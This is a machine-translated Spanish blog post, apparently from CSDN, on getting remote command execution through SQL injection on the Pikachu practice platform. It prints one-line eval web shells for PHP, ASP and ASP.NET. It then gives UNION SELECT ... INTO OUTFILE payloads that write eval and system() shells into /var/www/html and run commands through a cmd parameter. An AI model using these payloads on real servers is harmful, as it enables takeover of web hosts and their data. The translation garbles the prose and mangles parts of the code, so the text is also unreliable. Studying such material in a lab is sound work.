Inyección -os plataforma de pruebas de control remoto basado en SQL Pikachu

frase de Troya

Es un corto y delgado cliente de Troya, utilizamos varias funciones para ejecutar código en el lenguaje proporcionado por, o utilizado para llevar a cabo las funciones de los comandos del sistema operativo para la construcción de un sencillo programa de caballo de Troya, lo que significa que podemos esta función se escribe directamente en el interior del archivo, a través del acceso al archivo para realizar esta función, la función de ir operación pase interior que corresponde a lo que queremos, porque la propia función se utiliza para ejecutar comandos del sistema operativo, algunos contenido estará operando como un mando a distancia para llevar a cabo. Bueno para esconderse, y poderoso
PHP :; <PHP @eval ($ _POST [ 'Chopper']) ??>
ASP: <% eval Request ( "Chopper")%>
ASP.NET:<%@ Page Language = " Jscript "%> <% eval ( Request.Item [" chopper "]," inseguros ");%>

Vulnerabilidad de inyección a través de SQL, escribir código malicioso para
seleccionar 1, 2 en archivo_salida "/var/www/html/1.txt"
resultado 1.txt de select en archivo_salida va a escribir en el directorio especificado
no hace eco de alguna inyección se puede utilizar en archivo_salida escribe los resultados en el archivo especificado, y luego obtener acceso
Requisitos:
1. necesidad de conocer directorio remoto
2. la necesidad de directorio remoto tiene permisos de escritura
3. necesidad de abrir una base de datos secure_file_priv (nueva versión características de MySQL desactivado por defecto, se no se puede utilizar en archivo_salida escribir algo)

Buscar en la base de datos de la
muestra variables globales como '%% seguro ';
podemos ver, por defecto secure_file_priv hay ninguno queremos cambiarlo a vaciar, necesidad de modificar el archivo my.cnf, la secure_file_priv = null añade, a continuación, reinicie el servicio de base de datos
entonces no es / var / www / html permisos de directorio tenemos que escribir
y luego construyen carga
k 'de la Unión SELECT "<? PHP @eval ($ _ GET [' Test '])?> " 2 eN archivo_salida"/ var / www / html / 1.php "#
y luego enviar, no vemos lo que el delantero está hecho eco
y luego cortamos con el servidor para ver si el archivo aún no ha sido escrito en

K 'Unión SELECT "<? Php Sistema (GET $ _ [' cmd '])?> " 2 EN archivo_salida" /var/www/html/2.php"#
php siguiente función del sistema se utiliza para ejecutar comandos del sistema operativo podemos pasar a través de parámetros se ingresan,
y luego visitar IP / 2.PHP? cmd = ifconfig encontró que iba a pasar por encima de la información de tarjetas

Publicado 13 artículos originales · ganado elogios 1 · visitas 252

Supongo que te gusta

Origin blog.csdn.net/qq_43499389/article/details/104970500
Recomendado
Clasificación